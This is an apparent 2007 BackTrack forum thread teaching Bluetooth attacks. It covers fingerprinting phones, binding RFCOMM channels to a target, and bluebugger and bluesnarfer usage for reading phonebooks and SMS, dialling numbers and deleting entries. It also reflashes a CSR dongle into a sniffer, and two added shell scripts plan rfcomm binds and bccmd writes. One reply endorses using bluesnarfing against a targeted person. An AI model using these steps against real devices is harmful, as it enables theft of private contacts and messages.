[New Tutorial For BT3 ONLY] One bluetooth post to rule them all!



drgr33n
12-13-2007, 01:20 AM
Backtrack Ultimate Bluetooth Tutorial

Hey all

After I received lots of mail and requests I decided to shed some more light on bluetooth. In this tutorial I am going to be covering the following subjects...

1) Setting up your bluetooth equipment
2) Scanning and fingerprinting devices
3) Connectivity and RFCOMM
4) Bluebugging & Bluesnarfing

And as a merry Christmas to all at remote exploits :D

5) Making bluetooth sniffing hardware for $39.99

Video tutorials on different subjects will be added to this post over the next week.

OK, let's begin. The first subject might sound silly to most here, but for the guys who just don't know I'm going to cover it anyway. To set up your Bluetooth USB device, simply plug it in and wait 10 seconds. Then type in a console



hciconfig hci0 up


And you should have your adapter up and working; you can test with the following command:



hciconfig -a


And you should see something like the following:



hci0: Type: USB
BD Address: 00:11:22:33:44:55 ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING
RX bytes:85 acl:0 sco:0 events:9 errors:0
TX bytes:33 acl:0 sco:0 commands:9 errors:0
Features: 0xbf 0xfe 0x8d 0x78 0x08 0x18 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'ISSCBTA'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.2 (0x2) HCI Rev: 0x1fe LMP Ver: 1.2 (0x2) LMP Subver: 0x1fe
Manufacturer: Integrated System Solution Corp. (57)


OK, if you are stuck at this point I would suggest you go out and buy a USB dongle that is compatible with BackTrack :D But if you are still with me, let's move on.

Next is fingerprinting a Bluetooth device. Fingerprinting is the term we use for profiling a device, and to do this BackTrack has a collection of tools called BlueZ. BlueZ is the standard Bluetooth stack for Linux. For fingerprinting we can use a couple of those tools. One is hcitool; we can use hcitool to scan for devices that are broadcasting. We scan with hcitool using the following command.



hcitool scan hci0


And you should see something like ...



Scanning ...
00:11:22:33:44:55 hackme


You can also brute-force scan for devices; BackTrack has you covered on this too with a wonderful tool called btscanner. btscanner can also do inquiry scans :D You would use btscanner in inquiry scan mode if you were wardriving.

The other tool is sdptool. sdptool will browse our target for open channels and tell us what services are available on which channels.

We fingerprint a device with sdptool by issuing the following command:



sdptool browse victim_Mac


And you should see something like this .........



Service Name: Serial Port
Service RecHandle: 0x10001
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 2
Profile Descriptor List:
"Serial Port" (0x1101)
Version: 0x0100

Service Name: Dial-up Networking
Service RecHandle: 0x10002
Service Class ID List:
"Dialup Networking" (0x1103)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Profile Descriptor List:
"Dialup Networking" (0x1103)
Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x10007
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 6
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Service Name: Object Push
Service RecHandle: 0x10008
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100


Let's take a look at what we have: on channel 2 we have a serial port, on channel 3 we have dial-up networking, on channel 6 we have OBEX FTP and on channel 7 we have OPUSH.

All are interesting :D And now we have a pretty good idea about what the device is and so on.

Now on to the bit most people I speak to struggle with :D the dreaded RFCOMM :O RFCOMM is a simple transport protocol, built on top of the L2CAP protocol, that provides an emulated RS-232 serial port. Or, in layman's terms, it provides the language your device and laptop need to talk to each other.

Now the first thing to do is to set up our Bluetooth configuration, so let's go over to the /etc dir and get stuck in.

Open /etc/bluetooth/hcid.conf and replace the lot with this:



#
# HCI daemon configuration file.
#

# HCId options
options {
# Automatically initialize new devices
autoinit yes;

# Security Manager mode
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security auto;

# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts
pairing multi;

# Default PIN code for incoming connections
passkey "1234";
}

# Default settings for HCI devices
device {
# Local device name
# %d - device id
# %h - host name
name "device1";

# Local device class
class 0x000000;

# Default packet type
#pkt_type DH1,DM1,HV1;

# Inquiry and Page scan
iscan enable; pscan enable;

# Default link mode
# none - no specific policy
# accept - always accept incoming connections
# master - become master on incoming connections,
# deny role switch on outgoing connections
lm accept,master;

# Default link policy
# none - no specific policy
# rswitch - allow role switch
# hold - allow hold mode
# sniff - allow sniff mode
# park - allow park mode
lp rswitch,hold,sniff,park;
auth enable;
encrypt enable;
}


You can set up your own passkey and name. Also, go over to a shell and type



hciconfig -a


And copy the class into hcid.conf, save and exit. You could set up rfcomm here too, but it's a live CD.

Now restart your bluetooth device like so



bash /etc/rc.d/rc.bluetooth restart


And now we can set up our rfcomm binds. I will post a bash script when I have time :D but for now you will have to do it the manual way.

First thing is to set up our devices:



mknod -m 666 /dev/rfcomm0 c 216 3
mknod -m 666 /dev/rfcomm1 c 216 6
mknod -m 666 /dev/rfcomm2 c 216 7


OK, what we did there is create three binds to our Bluetooth device. The first one is rfcomm0 and is on channel 3, DUN (dial-up); the second is rfcomm1 and is on channel 6, FTP; and the third is rfcomm2 and is on channel 7, OBEX push.

Now let's connect it all up with sdptool.



sdptool add --channel=3 DUN
sdptool add --channel=6 FTP
sdptool add --channel=7 OPUSH


Now that we have set up our Bluetooth dongle correctly we can begin hacking :D

If I were to talk you through every possible exploit there is for Bluetooth it would take all of next year and I still wouldn't be finished, so the two hacks I am going to cover are bluesnarfer and bluebugger.

Bluesnarfer connects to a target Bluetooth device via Bluetooth's OBEX Push profile. But instead of pushing a business card, it pulls, using a "get" request for files with known names, such as the phonebook file (telecom/pb.vcf) or the calendar file (telecom/cal.vcs). Bluebugger works in a similar way.
Also bear in mind that these security flaws can still be used against you. With a little bit of social engineering you could pre-pair a phone to your laptop and exploit it from then onwards. Stand by for a video of bluesnarfer and bluebugger successfully completing a hack on my Samsung D600.

Both are pretty straightforward to use now that you have your Bluetooth set up correctly. I'm not going to post commands because there is a video on the way. First bluebugger:



bluebugger 0.1 ( MaJoMu | www.codito.de )
-----------------------------------------

Usage: bluebugger [OPTIONS] -a <addr> [MODE]

-a <addr> = Bluetooth address of target

Options:
--------
-m <name> = Name to use when connecting (default: '')
-d <device> = Device to use (default: '/dev/rfcomm')
-c <channel> = Channel to use (default: 17)
-n = No device name lookup
-t <timeout> = Timeout in seconds for name lookup (default: 5)
-o <file> = Write output to <file>

Mode:
-----
info = Read Phone Info (default)
phonebook = Read Phonebook (default)
messages = Read SMS Messages (default)
dial <num> = Dial number
ATCMD = Custom Command (e.g. '+GMI')

Note: Modes can be combined, e.g. 'info phonebook +GMI'


And Bluesnarfer ......




bluesnarfer, version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr

ATCMD : valid AT+CMD (GSM EXTENSION)

TYPE : valid phonebook type ..
example : "DC" (dialed call list)
"SM" (SIM phonebook)
"RC" (recevied call list)
"XX" much more

-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel

-c ATCMD : custom action
-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search "name" in phonebook address
-s TYPE : select phonebook memory storage
-l : list aviable phonebook memory storage
-i : device info


Now for the finale: how to turn an ordinary USB Bluetooth dongle into a $1000 sniffing tool :D
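Added example for the fingerprinting and RFCOMM sections above; this is not code from the original post or from BlueZ. It is a small POSIX shell script that turns `sdptool browse` output into a list of RFCOMM channels and then prints the `rfcomm bind` commands that associate a local /dev/rfcommN node with the remote address and channel. That binding is what makes /dev/rfcomm0 reach, say, channel 3 on the target; a bare `mknod` only creates the node and `sdptool add` only registers a service on your own dongle. The SDP records below and the target address 00:11:22:33:44:55 are constructed for the example; in the field, pipe real `sdptool browse <bdaddr>` output into `parse_sdp`.

```shell
#!/bin/sh
# Added example (not from the original post or BlueZ): parse `sdptool browse`
# output into "service<TAB>channel" lines, then build the `rfcomm bind` commands
# that map each RFCOMM channel on the *remote* device to a local /dev/rfcommN.
# Assumptions (mine): the target address below and the SDP records are a
# constructed sample shaped like the output shown in the post.

TARGET="${TARGET:-00:11:22:33:44:55}"

# Constructed sample of `sdptool browse` output, trimmed to the fields used.
SAMPLE_SDP='Service Name: Serial Port
Service RecHandle: 0x10001
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 2

Service Name: Dial-up Networking
Service RecHandle: 0x10002
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 3

Service Name: OBEX File Transfer
Service RecHandle: 0x10007
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 6
  "OBEX" (0x0008)

Service Name: Object Push
Service RecHandle: 0x10008
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 7
  "OBEX" (0x0008)'

# parse_sdp: read sdptool output on stdin, print "service name<TAB>channel" per
# record. A "Service Name:" line opens a record; the first "Channel:" line after
# it closes it. Records without an RFCOMM channel are dropped.
parse_sdp() {
    awk -F': ' '
        /^Service Name:/               { name = $2; next }
        /^[ \t]*Channel:/ && name != "" { printf "%s\t%s\n", name, $2; name = "" }
    '
}

# bind_plan: read "name<TAB>channel" lines on stdin and print one
# `rfcomm bind <dev> <bdaddr> <channel>` line per service, numbering the local
# devices from 0. Nothing is executed here; pipe the output to sh to apply it.
bind_plan() {
    awk -F'\t' -v target="$TARGET" '
        { printf "rfcomm bind %d %s %s   # %s\n", NR - 1, target, $2, $1 }
    '
}

# channel_of NAME: channel number of one named service in the sample.
channel_of() {
    printf '%s\n' "$SAMPLE_SDP" | parse_sdp | awk -F'\t' -v n="$1" '$1 == n { print $2 }'
}

printf '%s\n' "$SAMPLE_SDP" | parse_sdp | bind_plan
```

Pipe the printed plan into `sh` to apply it; `rfcomm show` lists the current bindings and `rfcomm release all` removes them again. Once bound, /dev/rfcomm0 can be handed straight to bluebugger with `-d /dev/rfcomm0`, or opened with `rfcomm connect 0` to check that the channel answers at all.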

imported_spankdidly
12-13-2007, 01:25 AM
I have never gotten any of the bluetooth BS to work. Awesome tutorial though! :D

drgr33n
12-13-2007, 02:36 AM
Finally, and to say merry Xmas, here it is: how to turn an ordinary USB dongle with a Cambridge Silicon Radio chipset into the FTS4BT sniffing dongle :D Before we begin I would like to say I do not hold any responsibility for anybody breaking their equipment. You are doing this at your own risk, but hey, for $39 who cares :D

I have been reading up on this for a while now, and I was reading one of max@remote-exploit's papers where he had changed the firmware using the BlueZ utilities to make the dongle go into RAW mode or promiscuous mode.

EDIT

Seems I was a bit keen in this tutorial, as it turns out this mod was not successful after all. The reason is that there are two types of BlueCore-4 chipset, BlueCore-4 ROM and BlueCore-4 External. The ROM chip has the firmware embedded on the chip and the EXT model has external memory for the firmware. You need to be able to update the firmware to allow sniffing in Windows.

To find out if you have the right type of chipset, type ........




hciconfig hci* revision


And if you see EXT, excellent, but if you see ROM you are a no-go. Saying that, ROM chipsets will still go into RAW mode and the FTS4BT software reads the device as compatible, but calibration crashed for me.

Also, it must be in promiscuous mode because we see bytes via hciconfig and RAW in the modes??? I'm looking into this more at the moment, so as I learn more I will add to this.

First, let's back up your old firmware with dfutool.



dfutool -d hci0 archive backold.dfu


Select the number corresponding to your card. Next, let's fire up the card



hciconfig hci0 up


This may not make sense now but it will very soon, so pay attention lol. There are multiple places to read bytes on the stick. Depending on what card you are using these can be different. In general these are "Default" (0x0000), "param" (0x0008), "psi" (0x0001), "psf" (0x0002) and "psrom" (0x0004). If yours is different you can keep trying until you run out of numbers and then take the dongle back :D

Now we have to hunt down the values of the USB product and vendor identifiers.

To get the product ID type



bccmd psget -s 0x0000 0x02bf


And you should see


USB product identifier: 0x0001 (1)


And now the vendor ID



bccmd psget -s 0x0000 0x02be


From what I have read, most of the time the stuff you need to edit is in psf (0x0002), but yours may be different. But there are only five it can be :D Now let's write the new ID



bccmd psset -s 0x0000 0x02bf 0x0002


Now check the changes were made



bccmd psget -s 0x0000 0x02bf


And you should see now



USB product identifier: 0x0002 (2)


Success!

Now, from what I have read, nine times out of ten you don't need to change your vendor ID, but check to see if it's 0x0a12; if not, change that too.



bccmd psset -s 0x0000 0x02be 0x0a12


And you are done. There is support for *nix but I have yet to find it, but you can see it sniffing: if you keep retyping hciconfig hci0 you will see the TX and RX bytes rising, and you are in RAW mode :D



drgr33n ~ # hciconfig hci0
hci0: Type: USB
BD Address: 00:11:67:5A:A5:C8 ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:41281 acl:0 sco:0 events:0 errors:0
TX bytes:42532 acl:0 sco:0 commands:1971 errors:0

drgr33n ~ # hciconfig hci0
hci0: Type: USB
BD Address: 00:11:67:5A:A5:C8 ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:41293 acl:0 sco:0 events:0 errors:0
TX bytes:42535 acl:0 sco:0 commands:1972 errors:0

drgr33n ~ # hciconfig hci0
hci0: Type: USB
BD Address: 00:11:67:5A:A5:C8 ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:41305 acl:0 sco:0 events:0 errors:0
TX bytes:42538 acl:0 sco:0 commands:1973 errors:0

drgr33n ~ # hciconfig hci0
hci0: Type: USB
BD Address: 00:11:67:5A:A5:C8 ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:41317 acl:0 sco:0 events:0 errors:0
TX bytes:42541 acl:0 sco:0 commands:1974 errors:0

drgr33n ~ # hciconfig hci0
hci0: Type: USB
BD Address: 00:11:67:5A:A5:C8 ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:41329 acl:0 sco:0 events:0 errors:0
TX bytes:42544 acl:0 sco:0 commands:1975 errors:0


Now, more and more stuff is coming out every month on this, so it may seem pointless now, but give it 6 months and you will be laughing :D

Merry Christmas !
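Added example for the CSR dongle section above; this is not code from the post or from BlueZ. It is a shell wrapper that reads the `Chip version:` line that BlueZ's `hciconfig <dev> revision` prints for CSR parts and only emits the PS-key write sequence (firmware backup, read vendor and product ID, write product ID 0x0002, read it back) when the chip reports BlueCore4-External. Commands are printed rather than executed unless DO_IT=1 is set, so the checks can be read and tried without a dongle plugged in. The two hciconfig dumps, including their build numbers, are constructed samples.

```shell
#!/bin/sh
# Added example (not from the original post or BlueZ): gate the CSR product-ID
# change on the chip type reported by `hciconfig <dev> revision`, and emit the
# bccmd sequence with a firmware backup and a read-back check.
# Commands are printed, not executed, unless DO_IT=1 is set in the environment.
# Assumptions (mine): BlueZ prints "Chip version: BlueCore4-External" or
# "Chip version: BlueCore4-ROM" for CSR parts; the two dumps below are
# constructed samples, including their build numbers.

DEV="${DEV:-hci0}"

SAMPLE_EXT='hci0:   Type: USB
        BD Address: 00:11:67:5A:A5:C8 ACL MTU: 384:8 SCO MTU: 64:8
        Build 1958
        Chip version: BlueCore4-External
        Max key size: 128 bit
        SCO mapping:  HCI'

SAMPLE_ROM='hci0:   Type: USB
        BD Address: 00:0E:E7:50:02:6F ACL MTU: 384:8 SCO MTU: 64:8
        Build 2031
        Chip version: BlueCore4-ROM
        Max key size: 128 bit
        SCO mapping:  HCI'

# chip_type: read `hciconfig <dev> revision` output on stdin and print "ext",
# "rom" or "unknown" (no Chip version line at all, e.g. a non-CSR dongle).
chip_type() {
    awk '
        /Chip version:/ {
            if ($0 ~ /External/) print "ext"; else if ($0 ~ /ROM/) print "rom"; else print "unknown"
            found = 1
        }
        END { if (!found) print "unknown" }
    '
}

# run: echo the command line; execute it only when DO_IT=1.
run() {
    printf '%s\n' "$*"
    if [ "${DO_IT:-0}" = "1" ]; then "$@"; fi
}

# sniffer_plan CHIP: refuse unless CHIP is "ext"; otherwise back up the
# firmware, check the vendor ID when really executing, write product ID 0x0002
# and read it back. Returns non-zero without touching the dongle on refusal.
sniffer_plan() {
    case "$1" in
        ext) ;;
        rom) echo "BlueCore4-ROM: firmware is fixed in ROM, not writing PS keys" >&2; return 1 ;;
        *)   echo "unrecognised chip, not writing PS keys" >&2; return 1 ;;
    esac
    if [ "${DO_IT:-0}" = "1" ]; then
        vendor="$(bccmd -d "$DEV" psget -s 0x0000 0x02be)"   # expect "USB vendor identifier: 0x0a12"
        case "$vendor" in
            *0x0a12*) ;;
            *) echo "vendor ID is not 0x0a12, stopping: $vendor" >&2; return 1 ;;
        esac
    fi
    run dfutool -d "$DEV" archive backold.dfu          # keep the original firmware
    run bccmd -d "$DEV" psget -s 0x0000 0x02be         # vendor ID, expect 0x0a12 (CSR)
    run bccmd -d "$DEV" psget -s 0x0000 0x02bf         # product ID before the change
    run bccmd -d "$DEV" psset -s 0x0000 0x02bf 0x0002  # product ID of the FTS4BT dongle
    run bccmd -d "$DEV" psget -s 0x0000 0x02bf         # read back, should now be 0x0002
}

for sample in "$SAMPLE_EXT" "$SAMPLE_ROM"; do
    chip="$(printf '%s\n' "$sample" | chip_type)"
    echo "== chip type: $chip"
    sniffer_plan "$chip" || echo "   (nothing written)"
done
```

To use it against a real dongle, replace the loop with `hciconfig "$DEV" revision | chip_type` and call `sniffer_plan` with the result; run it once without DO_IT to read the plan, then with `DO_IT=1`. Keep backold.dfu, since the product-ID change is what makes the dongle show up as the sniffer rather than a normal HCI adapter.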

imported_spankdidly
12-13-2007, 02:45 AM
http://www.5min.com/Video/Eavesdropping-on-Bluetooth-Headsets-925061

Funny Stuff.

I was able to get most of this working, however, my headset was not vulnerable or something.

Re@lity
12-13-2007, 03:17 AM
Very nice write up :)

As you stated, this isn't an area that really gets much coverage, primarily because it has always been artificially *held* within the mega-bucks arena.
But I suppose I can understand why, too ;)

drgr33n
12-13-2007, 03:18 AM
Yeah, Car Whisperer is funny and a nice addition too. Cheers spankdidly :D

@ Re@lity yep, that's why we have to bring their $1000 bill down to $39 ;D

ESC201
12-13-2007, 03:52 AM
Just as some side info, if you are using a Logitech Bluetooth adapter that came with your keyboard/mouse you may get an issue with the hciconfig hci0 up command. To remedy this, enter the commands...

hid2hci
hciconfig hci0 up

and last, to make sure it's up, hciconfig -a

This probably doesn't apply to many people but oh well.
(I had that problem though. Thanks google. :) )

Andy90
12-13-2007, 11:49 AM
Dr_Green I love you !!!

Will have a go at this lot the other side of the weekend :)

Much appreciated.

imported_tsunami
12-13-2007, 03:05 PM
Great Dr_Greeeeeeeennnnnnn!

drgr33n
12-13-2007, 05:23 PM
Thanks guys glad you liked it, sorry about the bad english and spelling, It was late last nite and I was running on about 10 % brainpower :D Just been through and sorted the odd really bad bits out.

imported_spankdidly
12-13-2007, 06:10 PM
Thanks guys glad you liked it, sorry about the bad english and spelling, It was late last nite and I was running on about 10 % brainpower :D Just been through and sorted the odd really bad bits out.

You do more with your 10% brain power than I do with 85%. Good Tut.

dapirates1
12-13-2007, 06:47 PM
open /etc/bluetooth/hcid.conf and replace the lot with this


I don't have this directory using BT2 final. Do I just create it?
Thank you for the tutorial

imported_spankdidly
12-13-2007, 06:49 PM
Yeah, that will work.

HighPointSecurity
12-14-2007, 05:20 AM
When I type:
mknod -m 666 /dev/rfcomm/0 c 216 3

I get:

mknod: 'dev/rfcomm/0': no such file or directory

====================================

also same result when I type:

bash /etc/rc.d/rc.bluetooth restart

===================================

Are you using the same version of BT2 as the ISO download ???

drgr33n
12-14-2007, 11:41 AM
Sorry guys, I should have put it in the title: this tutorial is for BackTrack 3.

Now uploading the little bluesnarfing / bluebugging demo video.

-=Xploitz=-
12-14-2007, 06:14 PM
Sorry guys, I should have put it in the title: this tutorial is for BackTrack 3.



Ill take care of that for ya. ;)

sunnyd24
12-15-2007, 02:22 AM
I got the following similar to highpointsecurity, although restart works the mknod stuff doesn't.

I'm using BT3 beta, am I missing something!


bt ~ # bash /etc/rc.d/rc.bluetooth restart
Stopping Bluetooth subsystem: pand dund rfcomm hidd sdpd hcid.
Starting Bluetooth subsystem: hcid passkeys.

bt ~ # mknod -m 666 /dev/rfcomm/0 c 216 3
mknod: `/dev/rfcomm/0': No such file or directory

bt ~ # mknod -m 666 /dev/rfcomm/1 c 216 6
mknod: `/dev/rfcomm/1': No such file or directory

Regards,
Sun

sunnyd24
12-15-2007, 02:35 AM
Ok figured out the problem highpointsecurity, :)

I used the following:
bt ~ # mknod -m 666 /dev/rfcomm0 c 216 3
bt ~ # mknod -m 666 /dev/rfcomm1 c 216 6

notice the / in rfcomm/0 has been removed!

Maybe Dr Green can OK this, and if it's right then correct the tutorial? (Must be a typo) :confused:

Regards,
Sun

ju1ce
12-15-2007, 03:20 AM
I figured I would make my first post a useful one.. Long time lurker but trying to contribute more now that I have time..

the CSR tutorial was excellent and I had been wanting to do this since i first read about the capabilities a bit ago..

anyways.. the useful part..

If you can't locate the usb dongle recommended above.. I've located pretty much the ultimate option for creating a sniffing bluetooth device WITH RP-SMA connector ALREADY BUILT IN!

I ordered one a while back and just broke it out a few weeks ago to play with and i'm quite impressed.. decent construction, good range out of the box, compatible with bt2final out of the box.. and to boot.. it's a CSR chipset and has the RP-SMA connector onboard like I mentioned..

can't seem to post a url since i'm so new.. so if someone can pm me I can drop the link and you can add it to the thread.. or just goto the a7eng website and look for the eb502-hci bluetooth usb adapter..


I had been looking for a Bluetooth dongle that did not need to be modified for some time and stumbled on this one.. I definitely recommend you pick one up as they're literally awesome..

enjoy..

DeL3e7
12-16-2007, 03:08 PM
what kind of hacking can be done without pairing?

JF1980
12-16-2007, 03:24 PM
what kind of hacking can be done without pairing?

From what I can see not much at all unless the phone is 10+ years old!

drgr33n
12-17-2007, 03:37 AM
Thanks -=xploits=- :D

And yes sunnyd24, sorry, a typo :o I'm sorry and I'll correct it now.

sunnyd24
12-17-2007, 03:41 PM
No problem, Glad I could be of help!
Dr Green, the tutorials must be quite difficult to produce. Thanks anyway!

drgr33n
12-17-2007, 04:34 PM
Sorry ju1ce didn't see you there :D heres the link to the card ju1ce added.

http://www.a7eng.com/products/embeddedblue/hci/eb502-HCI.htm

sunnyd24, nah, these tutorials are easy :D I am planning an advanced Bluetooth hacking guide explaining a bit more about the workings of Bluetooth in general, how the old hacks work, Bluetooth sniffing in practice, yada yada :D

And reading more it looks like bluez is now in the process of adding a csr sniffer :D google csrsniffer.c

EDIT

Going to be adding some more info on the CSR dongle modification in the next couple of hours. If you are interested in doing this hack, I would suggest going back and reading the modifications to the post :D

imported_sardinemaster
12-18-2007, 03:07 AM
hi!
Can I just say this looks very interesting, BUT one thing in this thread is missing... What is the actual point of this? What can you do by putting all these commands in? Bluesnarfing? What is it? What does it do?
You guys probably want to beat me up for my stupidity, but I am quite curious to know what it is, as it looks fairly interesting.

Cheers.

imported_spudgunman
12-18-2007, 12:17 PM
I am curious as well as to what the RAW mode will do... I show the following and don't know why I want to hack it. My USB Bluetooth also seems to look like a hacked version but it's not in RAW mode


bt ~ # bccmd psget -s 0x0000 0x02be
USB vendor identifier: 0x0a12 (2578)
bt ~ # bccmd psget -s 0x0000 0x02bf
USB product identifier: 0x0002 (2)
bt ~ # hciconfig hci0
hci0: Type: USB
BD Address: 00:0C:41:E1:FF:81 ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING
RX bytes:197 acl:0 sco:0 events:15 errors:0
TX bytes:124 acl:0 sco:0 commands:14 errors:0

bt ~ # hciconfig hci0 -a
hci0: Type: USB
BD Address: 00:0C:41:E1:FF:81 ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING
RX bytes:197 acl:0 sco:0 events:15 errors:0
TX bytes:124 acl:0 sco:0 commands:14 errors:0
Features: 0xff 0xff 0x0f 0x00 0x00 0x00 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'fukme'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.1 (0x1) HCI Rev: 0x20d LMP Ver: 1.1 (0x1) LMP Subver: 0x20d
Manufacturer: Cambridge Silicon Radio (10)

bt ~ #

drgr33n
12-18-2007, 07:45 PM
@ sardinemaster What a stupid question !!! :D I'm not going to waste my time answering those sort of questions !

@ spudgunman It looks like you may have some problems. Can you post the output of



bccmd psget -s 0x0001 0x02bf

imported_spankdidly
12-18-2007, 08:10 PM
@ sardinemaster What a stupid question !!! :D I'm not going to waste my time answering those sort of questions !


LOL, you just did!

You know how Par1s h1lton's phone got h4cked and all of her phone numbers got posted on the net? Well that was some sort of bluesnarf attack. You can do stuff like that. Why anyone would? I'm not sure. But if you were targeting someone then it would be something worth having in your arsenal. Then you can make one of these bad boys and do it from a few cities away.

http://www.boingboing.net/2005/03/13/howto-build-a-blueto.html

juststormy
12-18-2007, 08:23 PM
Hi,

Thanks a lot for this huge introduction to Bluetooth.
I'm suddenly at the point where I want to use bluesnarfer or bluebugger.
I cannot find your video where you wanted to explain how these work? I think I'm blind ;-)
Normally I'm only interested in WLAN and not Bluetooth, this should only be a short excursion into Bluetooth, so I hope you can show it to me :-)

Thanks a lot, man!

drgr33n
12-18-2007, 08:23 PM
@ spankdidly yea good point :D and then sniper rifles are cool :D until you get piped of by a police sniper thinking you are a terrorist :D

Did you know that paris hilton was not the victim of any "hack". The guy used his social engineering skills to get the info he needed. Well thats what I was told:D Not sure who he rang or conned for pictures like that lol

Sorry, I did upload it but it was terrible quality and I never bothered to do it again. Hang on, I'll upload it now.

drgr33n
12-18-2007, 09:38 PM
http://www.mediafire.com/?5gb2f3xjwwb

imported_sardinemaster
12-18-2007, 10:08 PM
@ Dr. Green:
I'm sorry, but i think that was terribly rude from your behalf not to answer me, not everyone has to know what this is, and when you start a post like this, you should take in account those that never heard of it, and put some kind of link in here, or a quick explanation made by yourself explaining what this actually is.

Cheers.

imported_spankdidly
12-18-2007, 10:13 PM
@ Dr. Green:
I'm sorry, but i think that was terribly rude from your behalf not to answer me, not everyone has to know what this is, and when you start a post like this, you should take in account those that never heard of it, and put some kind of link in here, or a quick explanation made by yourself explaining what this actually is.

Cheers.

No, That's not true. if you dont know what it is, then google the damn thing. His tutorial had the assumption that you KNOW something about the program. if you dont know, then look it up and research it. Don't whine to him because he wont tell you the in's and out's of a program on a web forum. You are obviously on the internet, so USE it.

Ps. Why the hell are you watching a tutorial about a program you have never heard of?

EDIT: ALSO, in the time it took you to write that post you could have looked it up and read the MAN pages on it. There, I'm done ranting :D

-=Xploitz=-
12-18-2007, 10:20 PM
Ps. Why the hell are you watching a tutorial about a program you have never heard of?

I watched numerous WEP cracking videos when I was a no0b...and I had no idea what the hell aircrack was. :eek:

I'm sure he saw the video...liked it and wanted to know more about what was going on. Pure curiousness is why he and why we all ask questions.

Give the kid a break spanky. :rolleyes:

imported_spankdidly
12-18-2007, 10:24 PM
I watched numerous WEP cracking videos when I was a no0b...and I had no idea what the hell aircrack was. :eek:

I'm sure he saw the video...liked it and wanted to know more about what was going on. Pure curiousness is why he and why we all ask questions.

Give the kid a break spanky. :rolleyes:

Sorry there sploitz. It seems I am coming across more and more posts like this. I understand you gotta learn somewhere. But Sheesh, whip out your google.com tool once in awhile. Yes, you may have been a noob, but you researched the EFF out of stuff before you asked questions. The guy didn't even try. Curiosity is one thing, not being able to type blusnarfer or bluebugger into google is another.

-=Xploitz=-
12-18-2007, 10:33 PM
Sorry there sploitz. It seems I am coming across more and more posts like this. I understand you gotta learn somewhere. But Sheesh, whip out your google.com tool once in awhile. Yes, you may have been a noob, but you researched the EFF out of stuff before you asked questions. The guy didn't even try. Curiosity is one thing, not being able to type blusnarfer or bluebugger into google is another.

Perhaps. :)

I get TONS and TONS of posts from no0bs posting VERY no0bish questions in my video threads all the time..and in PM's!! ESPECIALLY PM's!!! I have an open door policy..but they're taking advantage of it sometimes!! :D

But seriously. If you don't respond to noobish questions...they'll eventually give up and google or do a forum search anyways.

Sometimes its best to just not answer rather that tell em to go EFF off. ;)

imported_spankdidly
12-18-2007, 10:35 PM
Sometimes its best to just not answer rather that tell em to go EFF off. ;)

Ah the wise words of "TeH Sploitz" never cease to amaze me. :D:D:D

drgr33n
12-18-2007, 10:39 PM
I'm sorry, but i think that was terribly rude from your behalf not to answer me, not everyone has to know what this is, and when you start a post like this, you should take in account those that never heard of it, and put some kind of link in here, or a quick explanation made by yourself explaining what this actually is.


If you don't know what it is, maybe you should try this link.

http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-gb%3AIE-SearchBox&rlz=1I7ADBR&q=what+is+bluebugging

Guys :D chill out !!! That guy said what do I do with those commands :eek: If he didn't know what bluebugger does and what it is google is the way forward.

I will be happy to answer all questions regarding my post just not the ones asking what is the meaning of the post :D

imported_spankdidly
12-19-2007, 12:34 AM
If you don't know what it is, maybe you should try this link.

http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-gb%3AIE-SearchBox&rlz=1I7ADBR&q=what+is+bluebugging

Guys :D chill out !!! That guy said what do I do with those commands :eek: If he didn't know what bluebugger does and what it is google is the way forward.

I will be happy to answer all questions regarding my post just not the ones asking what is the meaning of the post :D

What's the meaning of this POST Dr Green!?!?

juststormy
12-19-2007, 12:37 AM
Soooo I've tested a lot but I think there is a conflict between me and my Bluetooth adapter :-D


bt ~ # hciconfig -a revision
hci0: Type: USB
BD Address: 00:02:72:81:3B:98 ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING PSCAN
RX bytes:899 acl:0 sco:0 events:44 errors:0
TX bytes:717 acl:0 sco:0 commands:43 errors:0
